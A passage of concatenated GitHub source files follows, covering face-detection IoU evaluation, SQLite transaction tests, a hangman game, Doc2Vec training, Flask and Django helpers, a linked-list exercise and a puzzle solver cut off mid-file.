position is at the bottom right corner\n bb2 : dict\n Keys: {'x1', 'x2', 'y1', 'y2'}\n The (x, y) position is at the top left corner,\n the (x2, y2) position is at the bottom right corner\n\n Or: bb1 is a tuple with data (x1, y1, x2, y2)\n bb2 is a tuple with data (x1, y1, x2, y2)\n\n Returns\n -------\n float\n in [0, 1]\n \"\"\"\n # determine the coordinates of the intersection rectangle\n\n x_left = max(bb1[0], bb2[0])\n y_top = max(bb1[1], bb2[1])\n x_right = min(bb1[2], bb2[2])\n y_bottom = min(bb1[3], bb2[3])\n\n if x_right < x_left or y_bottom < y_top:\n return 0.0\n\n # The intersection of two axis-aligned bounding boxes is always an\n # axis-aligned bounding box\n intersection_area = (x_right - x_left) * (y_bottom - y_top)\n\n # compute the area of both AABBs\n bb1_area = (bb1[2] - bb1[0]) * (bb1[3] - bb1[1])\n bb2_area = (bb2[2] - bb2[0]) * (bb2[3] - bb2[1])\n\n # compute the intersection over union by taking the intersection\n # area and dividing it by the sum of prediction + ground-truth\n # areas - the interesection area\n iou = intersection_area / float(bb1_area + bb2_area - intersection_area)\n \n# if iou >= 0.35:\n# print(\"iou > .35\")\n# iou = 1\n assert iou >= 0.0\n assert iou <= 1.0\n return iou\n\n\ndef plot_results(result, title):\n acc = []\n for i in range(0, len(result)):\n acc.extend(result[i][1])\n\n acc_arr = np.array(acc)\n avg_acc = np.mean(acc_arr)\n\n fig = plt.figure()\n ax = fig.add_axes([0, 0, 1, 1])\n\n idx = 0\n for i in range(0, len(result)):\n ar = result[i][1]\n plt.scatter(range(idx, idx + len(ar)), ar)\n idx = idx + len(ar)\n\n ax.set_title(title + ', Average of IoU: {}'.format(avg_acc))\n ax.set_ylabel('Intersection over Unions Average')\n ax.axes.xaxis.set_visible(False)\n plt.show()\n\n bad = [result[i][2] - result[i][3] for i in range(0, len(result))]\n\n n, bins, patches = plt.hist(x=bad, bins='auto', color='#0504aa',\n alpha=0.7, rwidth=0.85)\n plt.grid(axis='y', alpha=0.75)\n plt.xlabel('Incorrect')\n plt.ylabel('Frequency')\n plt.title(title + ', Number of Misdetections (NumCorrect-NumDetected)')\n plt.show()\n\n\ndef tester2(data, fbb):\n '''\n Tests the accuracy of the classifier vs. the ground truth.\n Input:\n data: tuple of (filename, bbs(list itself)), which is the output of get_data()\n\n Output:\n total: tuple of (filename, accuracy per face, count of faces)\n '''\n\n total = []\n\n # For each image\n for i in range(0, len(data)):\n\n boxes = data[i][1]\n num_faces = len(boxes)\n\n count = 0\n result = []\n detections = fbb[i]\n\n # loop over the detections\n for j in range(0, detections.shape[2]):\n\n # extract the confidence (i.e., probability) associated with the detection\n confidence = detections[0, 0, j, 2]\n\n # filter out weak detections by ensuring the confidence is greater than the minimum confidence\n if confidence > 0.3:\n count += 1 # keep track of found faces\n (startX, startY, endX, endY) = detections[0, 0, j, 3:7]\n mink = min_dist(startX, startY, boxes)\n\n known = (boxes[mink][0], boxes[mink][1], boxes[mink][0] + boxes[mink][2], boxes[mink][1] + boxes[mink][3])\n found = (startX, startY, endX, endY)\n\n result.append(get_iou(known, found))\n\n # for each image, get: name, avg, actual number of faces, count\n out = (data[i][0], result, num_faces, count)\n total.append(out)\n\n return total\n\n\ndef tester(data, prototxtPath, weightsPath):\n '''\n Tests the accuracy of the classifier vs. the ground truth.\n Input:\n data: tuple of (filename, bbs(list itself)), which is the output of get_data()\n prototxtPath: path to prototext file (used for DNN architecture)\n weightsPath: path to caffe file (used for DNN architecture)\n Output:\n total: tuple of (filename, average accuracy per face, count of faces)\n '''\n\n # Defining DNN (baseline classifier)\n net = cv2.dnn.readNet(prototxtPath, weightsPath)\n\n total = []\n\n # For each image\n for i in range(0, len(data)):\n\n # load the input image from disk, and grab the image spatial dimensions\n image = cv2.imread(data[i][0], cv2.IMREAD_COLOR)\n (h, w) = image.shape[:2]\n\n # construct a blob from the image\n blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), (104.0, 177.0, 123.0))\n\n # pass the blob through the network and obtain the face detections\n net.setInput(blob)\n detections = net.forward()\n boxes = data[i][1]\n num_faces = len(boxes)\n count = 0\n result = []\n\n # loop over the detections\n for j in range(0, detections.shape[2]):\n\n # extract the confidence (i.e., probability) associated with the detection\n confidence = detections[0, 0, j, 2]\n\n # filter out weak detections by ensuring the confidence is greater than the minimum confidence\n if confidence > 0.3:\n count += 1 # keep track of found faces\n\n # compute the (x, y)-coordinates of the bounding box for the object\n box = detections[0, 0, j, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n mink = min_dist(startX, startY, boxes)\n\n known = (\n boxes[mink][0], boxes[mink][1], boxes[mink][0] + boxes[mink][2], boxes[mink][1] + boxes[mink][3])\n found = (startX, startY, endX, endY)\n\n result.append(get_iou(known, found))\n\n # for each image, get: name, avg, actual number of faces, count\n out = (data[i][0], result, num_faces, count)\n total.append(out)\n\n return total","repo_name":"johngear/eecs504","sub_path":"validation_functions.py","file_name":"validation_functions.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73689374807","text":"\"\"\"\nTest transaction database. For each test, a test database is created in temporary directory\nby constructor of Transaction class. Then several records are inserted through sql statement\nto avoid potential errors from the `add` method. After all the tests, the temporary\ndirectory is removed.\n\"\"\"\n\n# Since we are using pytest fixtures, redefining outer name is necessary\n# pylint: disable=redefined-outer-name\n\nimport sqlite3\n\nimport pytest\n\nfrom transactions import Transaction\n\n\n@pytest.fixture\ndef setup_and_teardown(tmpdir):\n \"\"\"\n Set up a test database with several records inserted.\n :param tmpdir: pytest fixture, create a temp dir for the test\n :return: database instance\n \"\"\"\n database = Transaction(tmpdir.join('test.database'))\n con = sqlite3.connect(tmpdir.join('test.database'))\n cur = con.cursor()\n cur.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS transactions\n (\n item int,\n amount int,\n category text,\n date text,\n description text\n ) \"\"\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (1, 2, 'test1', '2022-03-21', 'This is a test')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (2, 2, 'test1', '2022-03-21', 'This is test 1')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (3, 3, 'test2', '2022-03-21', 'This is a test 2')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (4, 3, 'test2', '2022-03-22', 'This is a test 3')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (5, 4, 'test2', '2022-03-22', 'This is a test 4')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (6, 2, 'test2', '2022-04-24', 'This is a test 5')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (7, 1, 'test2', '2022-04-25', 'This is a test 6')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (8, 1, 'test2', '2023-02-22', 'This is a test 7')\")\n\n con.commit()\n con.close()\n return database\n\n\n@pytest.fixture\ndef setup_test_init(tmpdir):\n \"\"\"\n Set up an empty database for testing __init__ method\n :param tmpdir: pytest fixture, create a temp dir\n :return: database instance\n \"\"\"\n return Transaction(tmpdir.join('test.db'))\n\n\ndef test_init(setup_test_init):\n \"\"\"\n Test __init__ of the Transaction class\n :param setup_test_init: pytest fixture, takes care of creating and removing database files\n \"\"\"\n path = setup_test_init.database\n con = sqlite3.connect(path)\n cur = con.cursor()\n cur.execute(\"PRAGMA table_info(transactions)\")\n result = cur.fetchall()\n assert result in ([(0, 'item', 'INT', 0, None, 0),\n (1, 'amount', 'INT', 0, None, 0),\n (2, 'category', 'TEXT', 0, None, 0),\n (3, 'date', 'TEXT', 0, None, 0),\n (4, 'description', 'TEXT', 0, None, 0)],\n [(0, 'item', 'int', 0, None, 0),\n (1, 'amount', 'int', 0, None, 0),\n (2, 'category', 'text', 0, None, 0),\n (3, 'date', 'text', 0, None, 0),\n (4, 'description', 'text', 0, None, 0)])\n\n\ndef test_select_all(setup_and_teardown):\n \"\"\"\n Test select_all() method\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n assert setup_and_teardown.select_all() == [\n {'rowid': 1, 'item': 1, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is a test'},\n {'rowid': 2, 'item': 2, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is test 1'},\n {'rowid': 3, 'item': 3, 'amount': 3, 'category': 'test2',\n 'date': '2022-03-21', 'desc': 'This is a test 2'},\n {'rowid': 4, 'item': 4, 'amount': 3, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 3'},\n {'rowid': 5, 'item': 5, 'amount': 4, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 4'},\n {'rowid': 6, 'item': 6, 'amount': 2, 'category': 'test2',\n 'date': '2022-04-24', 'desc': 'This is a test 5'},\n {'rowid': 7, 'item': 7, 'amount': 1, 'category': 'test2',\n 'date': '2022-04-25', 'desc': 'This is a test 6'},\n {'rowid': 8, 'item': 8, 'amount': 1, 'category': 'test2',\n 'date': '2023-02-22', 'desc': 'This is a test 7'}\n ]\n\n\ndef test_delete(setup_and_teardown):\n \"\"\"\n Test delete() method. Delete one and then all records in database and test content\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n setup_and_teardown.delete(3)\n assert setup_and_teardown.select_all() == [\n {'rowid': 1, 'item': 1, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is a test'},\n {'rowid': 2, 'item': 2, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is test 1'},\n {'rowid': 4, 'item': 4, 'amount': 3, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 3'},\n {'rowid': 5, 'item': 5, 'amount': 4, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 4'},\n {'rowid': 6, 'item': 6, 'amount': 2, 'category': 'test2',\n 'date': '2022-04-24', 'desc': 'This is a test 5'},\n {'rowid': 7, 'item': 7, 'amount': 1, 'category': 'test2',\n 'date': '2022-04-25', 'desc': 'This is a test 6'},\n {'rowid': 8, 'item': 8, 'amount': 1, 'category': 'test2',\n 'date': '2023-02-22', 'desc': 'This is a test 7'},\n ]\n setup_and_teardown.delete(1)\n setup_and_teardown.delete(2)\n setup_and_teardown.delete(4)\n setup_and_teardown.delete(5)\n setup_and_teardown.delete(6)\n setup_and_teardown.delete(7)\n setup_and_teardown.delete(8)\n assert setup_and_teardown.select_all() == []\n\n\ndef test_add(setup_and_teardown):\n \"\"\"\n Test add() method. Add a new record to database and test its content.\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n setup_and_teardown.add({'item': 20, 'amount': 3, 'category': 'test_add',\n 'date': '2022-03-23', 'description': 'Testing add'})\n assert setup_and_teardown.select_all() == [\n {'rowid': 1, 'item': 1, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is a test'},\n {'rowid': 2, 'item': 2, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is test 1'},\n {'rowid': 3, 'item': 3, 'amount': 3, 'category': 'test2',\n 'date': '2022-03-21', 'desc': 'This is a test 2'},\n {'rowid': 4, 'item': 4, 'amount': 3, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 3'},\n {'rowid': 5, 'item': 5, 'amount': 4, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 4'},\n {'rowid': 6, 'item': 6, 'amount': 2, 'category': 'test2',\n 'date': '2022-04-24', 'desc': 'This is a test 5'},\n {'rowid': 7, 'item': 7, 'amount': 1, 'category': 'test2',\n 'date': '2022-04-25', 'desc': 'This is a test 6'},\n {'rowid': 8, 'item': 8, 'amount': 1, 'category': 'test2',\n 'date': '2023-02-22', 'desc': 'This is a test 7'},\n {'rowid': 9, 'item': 20, 'amount': 3, 'category': 'test_add',\n 'date': '2022-03-23', 'desc': 'Testing add'}\n ]\n\n\n@pytest.mark.add1\ndef test_add1(setup_and_teardown):\n \"\"\"\n Add a new record to database and test it by selecting it and check lenghth of tht database.\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n\n tran0 = {'item': '1',\n 'amount': '1',\n 'category': 'test',\n \"date\": '20220303',\n 'description': 'testing'\n }\n trans0 = setup_and_teardown.select_all()\n setup_and_teardown.add(tran0)\n trans1 = setup_and_teardown.select_all()\n assert len(trans1) == len(trans0) + 1\n\n\n@pytest.mark.delete1\ndef test_delete1(setup_and_teardown):\n \"\"\"\n Add a transaction to db, delete it, and see that the size changes\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n # first we get the initial table\n trans0 = setup_and_teardown.select_all()\n\n # then we add this transaction to the table and get the new list of rows\n tran = {'item': '1',\n 'amount': '1',\n 'category': 'test',\n \"date\": '20220303',\n 'description': 'testing'\n }\n rowid = setup_and_teardown.add(tran)\n trans1 = setup_and_teardown.select_all()\n\n # now we delete the transaction and again get the new list of rows\n setup_and_teardown.delete(rowid)\n trans2 = setup_and_teardown.select_all()\n\n assert len(trans0) == len(trans2)\n assert len(trans2) == len(trans1) - 1\n\n\ndef test_summary_by_date(setup_and_teardown):\n \"\"\"\n Test summary_by_date() method.\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n assert setup_and_teardown.summary_by_date() == [{'date': '2022-04-25', 'total': 1},\n {'date': '2023-02-22', 'total': 1},\n {'date': '2022-04-24', 'total': 2},\n {'date': '2022-03-21', 'total': 7},\n {'date': '2022-03-22', 'total': 7}]\n\n\ndef test_summary_by_month(setup_and_teardown):\n \"\"\"\n Test summary_by_month() method.\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n assert setup_and_teardown.summary_by_month() == [{'month': '02', 'total': 1},\n {'month': '04', 'total': 3},\n {'month': '03', 'total': 14}]\n\n\ndef test_summary_by_year(setup_and_teardown):\n \"\"\"\n Test summary_by_year() method.\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n assert setup_and_teardown.summary_by_year() == [{'total': 1, 'year': '2023'},\n {'total': 17, 'year': '2022'}]\n\n\ndef test_summary_by_category(setup_and_teardown):\n \"\"\"\n Test summary_by_category() method.\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n assert setup_and_teardown.summary_by_category() == [{'category': 'test1', 'total': 4},\n {'category': 'test2', 'total': 14}]\n","repo_name":"yanxuanshaozhu/103A-PA02","sub_path":"pa02/test_transaction.py","file_name":"test_transaction.py","file_ext":"py","file_size_in_byte":11257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35073143255","text":"from random import choice\r\n\r\n\r\nclass Service(object):\r\n \r\n \r\n def __init__(self, repo_sentences, validator):\r\n self.__repo = repo_sentences\r\n self.__valid = validator\r\n \r\n \r\n def add_sentence(self,sentence):\r\n \r\n self.__valid.valid_sentence(sentence)\r\n self.__repo.add()\r\n \r\n def get_hangman(self):\r\n number = self.__repo.get_hangman()\r\n hangman = ''\r\n word = \"hangman\"\r\n i = 0\r\n while i< number:\r\n hangman += word[i]\r\n i+=1\r\n return hangman\r\n \r\n def check_letter(self, letter):\r\n sentence = self.__repo.get_sentence()\r\n if letter not in sentence or letter in self.__repo.get_code():\r\n self.__repo.set_hangman(self.__repo.get_hangman()+1)\r\n else:\r\n i = 0\r\n for l in sentence:\r\n if l == letter:\r\n code = self.__repo.get_code()\r\n code = code[:i] + l + code[i+1:]\r\n self.__repo.set_code(code)\r\n i+=1 \r\n \r\n \r\n \r\n def get_code(self):\r\n return self.__repo.get_code()\r\n \r\n def start_game(self):\r\n self.__repo.get_random_sentence()\r\n \r\n def is_lose(self):\r\n if self.__repo.get_hangman == 7:\r\n return True\r\n return False\r\n \r\n def is_win(self):\r\n if self.__repo.get_sentence() == self.__repo.get_code():\r\n return True\r\n return False\r\n \r\n\r\n\r\n\r\n","repo_name":"dianatalpos/Fundamentals-of-Programming","sub_path":"hangman/business/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8619390052","text":"import ast\nimport os\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nimport pandas as pd\nimport argparse\n\ndef main(args):\n if not os.path.isdir(args.doc2vec_dir):\n os.makedirs(args.doc2vec_dir)\n\n # prepare data\n df = pd.read_csv(args.train_path)\n\n titles = [TaggedDocument(ast.literal_eval(doc), [i]) for i, doc in enumerate(df['outtitle'])]\n reviews = [TaggedDocument(ast.literal_eval(doc), [i]) for i, doc in enumerate(df['outreview'])]\n\n # train and save\n title_model = Doc2Vec(titles, size=args.title_dim, window=2, workers=4)\n title_model_path = os.path.join(args.doc2vec_dir, 'd2v_title_{}'.format(args.title_dim))\n title_model.save(title_model_path)\n\n review_model = Doc2Vec(reviews, size=args.review_dim, window=2, workers=4)\n review_model_path = os.path.join(args.doc2vec_dir, 'd2v_review_{}'.format(args.review_dim))\n review_model.save(review_model_path)\n\n print('Result:')\n print('title: {}'.format(title_model_path))\n print('review: {}'.format(review_model_path))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_path', type=str, required=True,\n help='Path of train dataset CSV file')\n parser.add_argument('--doc2vec_dir', type=str, required=True,\n help='Directory of Doc2Vec models')\n parser.add_argument('--title_dim', type=int, required=False, default=100,\n help='Dimension of title vectors')\n parser.add_argument('--review_dim', type=int, required=False, default=300,\n help='Dimension of review vectors')\n args = parser.parse_args()\n\n main(args)","repo_name":"chadaeun/2018-data-science-competition-final","sub_path":"prepare_doc2vec.py","file_name":"prepare_doc2vec.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20340903644","text":"\"\"\"Run this script to collate the data.\"\"\"\n\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nHERE = Path(__file__).parent.resolve()\nROOT = HERE.parent.resolve()\nDATA = ROOT.joinpath(\"data\")\nARTIFACTS = ROOT.joinpath(\"artifacts\")\nARTIFACTS.mkdir(exist_ok=True, parents=True)\nOUTPUT_PATH = ARTIFACTS.joinpath(\"collated.tsv\")\nSUMMARY_SVG_PATH = ARTIFACTS.joinpath(\"summary.svg\")\nHEADER = [\"#prefix\", \"did\", \"when\", \"nextofkin\"]\n\n\ndef main():\n \"\"\"Collate all files together.\"\"\"\n rows = []\n for path in DATA.glob(\"*.tsv\"):\n with path.open() as file:\n _header = next(file)\n for line in file:\n dead_id, when, alt_id = line.strip(\"\\n\").split(\"\\t\")\n rows.append((path.stem, dead_id, when, alt_id))\n\n rows = sorted(rows)\n\n with OUTPUT_PATH.open(\"w\") as file:\n print(*HEADER, sep=\"\\t\", file=file)\n for row in rows:\n print(*row, sep=\"\\t\", file=file)\n\n df = pd.DataFrame(rows, columns=[\"prefix\", \"dead_id\", \"date\", \"alternative_id\"])\n fig, ax = plt.subplots(figsize=(6, 3))\n sns.histplot(data=df, y=\"prefix\", ax=ax)\n ax.set_ylabel(\"\")\n ax.set_xscale(\"log\")\n ax.set_xlabel(\"Dead Identifiers\")\n fig.tight_layout()\n fig.savefig(SUMMARY_SVG_PATH)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bridgedb/tiwid","sub_path":"scripts/collate.py","file_name":"collate.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"37724401876","text":"## @file\n## @brief Flask templates\n\nfrom metaL import *\n\n## @defgroup fl FL\n## @brief Flask templates\n## @ingroup web\n## @{\n\n\nclass flModule(webModule):\n\n def init_reqs(self):\n super().init_reqs()\n (self.reqs // 'flask').sync()\n\n def static_logo(self):\n return \"{{ url_for('static', filename='logo.png') }}\"\n\n def init_py(self):\n super().init_py()\n self.init_index()\n self.py.top //\\\n pyImport('flask') //\\\n f'app = flask.Flask(\"{self}\")'\n self.py.mid //\\\n self.index\n self.py.bot //\\\n 'app.run(host=config.HOST,port=config.PORT,debug=True)'\n self.py.sync()\n\n def init_index(self):\n self.index = Section('index')\n self.index //\\\n \"@app.route('/')\" //\\\n (S('def index():') //\n 'return flask.render_template(\"index.html\")'\n )\n\n def init_vscode_ext(self):\n super().init_vscode_ext()\n self.vscode.ext.ext // '\"wholroyd.jinja\",'\n self.vscode.ext.sync()\n\n\n## @}\n","repo_name":"ponyatov/metaLv0","sub_path":"fl.py","file_name":"fl.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"33864082490","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 12:07:49 2019\n\n@author: Alejandro\n\"\"\"\n\n\"\"\" 6. Definir una función inversa() que calcule la inversión de una cadena. \nPor ejemplo la cadena estoy probando debería devolver la cadena odnaborp yotse \"\"\"\n\ndef inversa(cadena):\n inversa = \"\"\n for i in range(len(cadena), 0, -1):\n inversa += cadena[i-1]\n return inversa\n\nif __name__ == '__main__':\n print(inversa(\"estoy probando\"))","repo_name":"AlejandroDmartz/Python","sub_path":"Boletin_basico/Ejercicio6.py","file_name":"Ejercicio6.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19954522976","text":"'''\n题目描述:\n给定一个头结点为 root 的链表, 编写一个函数以将链表分隔为 k 个连续的部分。\n\n每部分的长度应该尽可能的相等: 任意两部分的长度差距不能超过 1,也就是说可能有些部分为 null。\n\n这k个部分应该按照在链表中出现的顺序进行输出,并且排在前面的部分的长度应该大于或等于后面的长度。\n\n返回一个符合上述��则的链表的列表。\n\n举例: 1->2->3->4, k = 5 // 5 结果 [ [1], [2], [3], [4], null ]\n\n示例 1:\n输入:\nroot = [1, 2, 3], k = 5\n输出: [[1],[2],[3],[],[]]\n解释:\n输入输出各部分都应该是链表,而不是数组。\n例如, 输入的结点 root 的 val= 1, root.next.val = 2, \\root.next.next.val = 3, 且 root.next.next.next = null。\n第一个输出 output[0] 是 output[0].val = 1, output[0].next = null。\n最后一个元素 output[4] 为 null, 它代表了最后一个部分为空链表。\n\n示例 2:\n输入:\nroot = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], k = 3\n输出: [[1, 2, 3, 4], [5, 6, 7], [8, 9, 10]]\n解释:\n输入被分成了几个连续的部分,并且每部分的长度相差不超过1.前面部分的长度大于等于后面部分的长度。\n \n\n提示:\nroot 的长度范围: [0, 1000].\n输入的每个节点的大小范围:[0, 999].\nk 的取值范围: [1, 50].\n'''\n\n'''\n解题思路:\n长度//k 得到k个list中每个list至少要有几个Node\n长度%k 得到多余的Node,应当list从前往后,一次放一个Node,直到多余的Node耗尽\n'''\n\nfrom LinkedList.ListNode import ListNode\nfrom typing import List\n\n\nclass Solution:\n def splitListToParts(self, head: ListNode, k: int) -> List[ListNode]:\n\n ans = []\n # 链表长度\n queue = []\n n = 0\n while head:\n n += 1\n queue.append(head)\n head = head.next\n\n base = n // k\n bonus = n % k\n\n for _ in range(k):\n cur_part = []\n\n # 先放base数量\n for _ in range(base):\n cur_part.append(queue.pop(0))\n\n # 再放bonus\n if bonus > 0:\n cur_part.append(queue.pop(0))\n bonus -= 1\n\n if cur_part:\n newHead = cur_part[0]\n end = cur_part[-1]\n end.next = None\n ans.append(newHead)\n else:\n ans.append(None)\n\n return ans\n\n def splitListToParts2(self, head: ListNode, k: int) -> List[ListNode]:\n # 更快\n ans = []\n root = head\n # 链表长度\n n = 0\n while head:\n n += 1\n\n head = head.next\n\n base = n // k\n bonus = n % k\n\n for _ in range(k):\n ans.append(root)\n if bonus > 0:\n for _ in range(base):\n root = root.next\n bonus -= 1\n else:\n for _ in range(base - 1):\n root = root.next\n\n if root:\n temp = root.next\n root.next = None\n else:\n temp = None\n\n root = temp\n\n return ans\n\n","repo_name":"JTShuai/LeetCode_Notes","sub_path":"LinkedList/725_分隔链表.py","file_name":"725_分隔链表.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37261452958","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework.authtoken.views import ObtainAuthToken\n\nfrom .views import (\n BloggerCreateView, \n ActivateAccountView,\n FollowRelationView\n)\n\nrouter = DefaultRouter()\nrouter.register(r'blogger', BloggerCreateView)\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('activate///', ActivateAccountView.as_view()),\n path('login/', ObtainAuthToken.as_view()),\n path('follow///', FollowRelationView.as_view())\n]","repo_name":"Ezenwankwo/yarn","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73508367767","text":"import sys\nfrom select import select\nfrom pathlib import Path\nfrom colorama import init, Fore, Back, Style\nfrom work.models import Visitor, Mage\n\ndebug = False\n\ninit(autoreset = True)\nprint(Fore.BLACK + Back.CYAN + '******* {} *******'.format(Path(__file__)))\n\nvisitall = Visitor.objects.all()\nvisit = visitall.order_by('-date')\nprint(Fore.GREEN + 'total {}'.format(visit.count()))\nvisivote = Visitor.objects.filter(voted=True)\nprint(Back.BLUE + '\\n{} voted'.format(visivote.count()))\nfor v in visivote: print(v.ip_address)\nvisimess = Visitor.objects.exclude(message='')\nprint(Back.MAGENTA + '\\n{} messages'.format(visimess.count()))\nfor v in visimess: print('message[{}] = {} {}'.format(v.ip_address,\n\t\t\t\t\t\t\t\t\t\t\t\t\t v.dessage(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t len(v.mages.all())))\n\nroboco = 0\nfor v in visit:\n\tv.set_bifi()\n\ttn = Fore.BLUE + '{} {} '.format(v.ip_address, v.bifistr)\n\tif v.has_message(): tn += Fore.GREEN + 'message: {} '.format(v.dessage())\n\tif v.voted:\ttn += Fore.MAGENTA + 'voted '\n\tif v.lang == 'en': tn += Fore.CYAN + 'changed language '\n\tif v.marray_size() > 0:\ttn += Fore.BLUE + 'marray_size: {}, code: {} '.format(v.marray_size(), v.code)\n\tif v.is_robo():\n\t\troboco += 1\n\t\ttn += Fore.RED + '(-robo-)'\n\n\tif debug: print(tn)\n\nif roboco == 10: print(Fore.BLACK + Back.CYAN + 'no robots detected')\nelse:\n\tprint(Fore.BLACK + Back.CYAN +\n\t\t '\\n{} robot records detected, i have created a python script named delete_robo.py to delete the majority of these records'.format(roboco))\n\tprint(Fore.WHITE + Back.BLACK +\n\t\t 'manage.py shell -c \\'import script.delete_robo\\'' +\n\t\t Fore.BLACK + Back.CYAN +\n\t\t '\\nto delete robot record from the database')\n\tprint()\n\ndef run():\n\tvv = Visitor.objects.all()\n\tmm = Mage.objects.all()\n\n\tfor m in mm:\n\t\tdanni = []\n\t\tfor v in vv:\n\t\t\tipa = v.ip_address\n\t\t\tif m in v.mages.all():\n\t\t\t\tif ipa == '127.5.0.1': pass\n\t\t\t\telse: danni.append(ipa)\n\n\t\tif len(danni) > 0: print('{} -> {}'.format(m, danni))\n\nif debug: run()\n\n\n\n","repo_name":"kaloyansen/deploy","sub_path":"app/script/visit.py","file_name":"visit.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17060499932","text":"import csv\nimport os\nimport re\n\n\ndef get_country_list(name):\n '''\n get a list of countries for a region. Currently implemented regions: europe\n '''\n filename = os.path.join(os.path.dirname(__file__), \"resources\", f\"{name}.csv\")\n\n countries = []\n point = re.compile(r'POINT\\s*\\((.*)\\)')\n with open(filename, newline='') as fh:\n reader = csv.DictReader(fh)\n for row in reader:\n if row['id'].startswith('#'):\n continue\n m = re.search(point, row['point'])\n if m:\n lon, lat = m[1].split(sep=\" \")\n countries.append(Country(row['name'], float(lat), float(lon)))\n return countries\n\n\nclass Country:\n def __init__(self, name, lat: float, lon: float) -> None:\n self.name = name\n self.lat = lat\n self.lon = lon\n def __str__(self) -> str:\n return \",\".join([self.name, f\"POINT({self.lon:.3f} {self.lat:.3f})\"])\n def __repr__(self) -> str:\n return f\"Country({self})\"\n\ndef _to_diana_txt_file(filename, name):\n with open(filename, 'wt') as fh:\n fh.write('''# -*- coding: utf-8 -*-\n[COLUMNS\nLon:r Lat:r Name:s ]\n\n[DATA]\n''')\n for cc in get_country_list(name):\n fh.write(f\"{cc.lon} {cc.lat} \\\"{cc.name}\\\"\\n\")\n\n\nif __name__ == '__main__':\n print(get_country_list('europe'))\n","repo_name":"metno/snap","sub_path":"utils/SnapPy/Snappy/Countries.py","file_name":"Countries.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"31"} +{"seq_id":"25991539256","text":"#!/usr/bin/python3\n\nimport string\n\nnum_workers = 5\ntime_const = 60\n\nwith open('./resources/input.txt', 'r') as f:\n contents = f.read().splitlines()\n\n prereq_index = {}\n ordered_steps = []\n\n # Parse everything we need to know about the steps\n for record in contents:\n focal_step = record[36]\n prereq = record[5]\n\n if prereq not in prereq_index:\n prereq_index[prereq] = {}\n prereq_index[prereq]['prereqs'] = set()\n 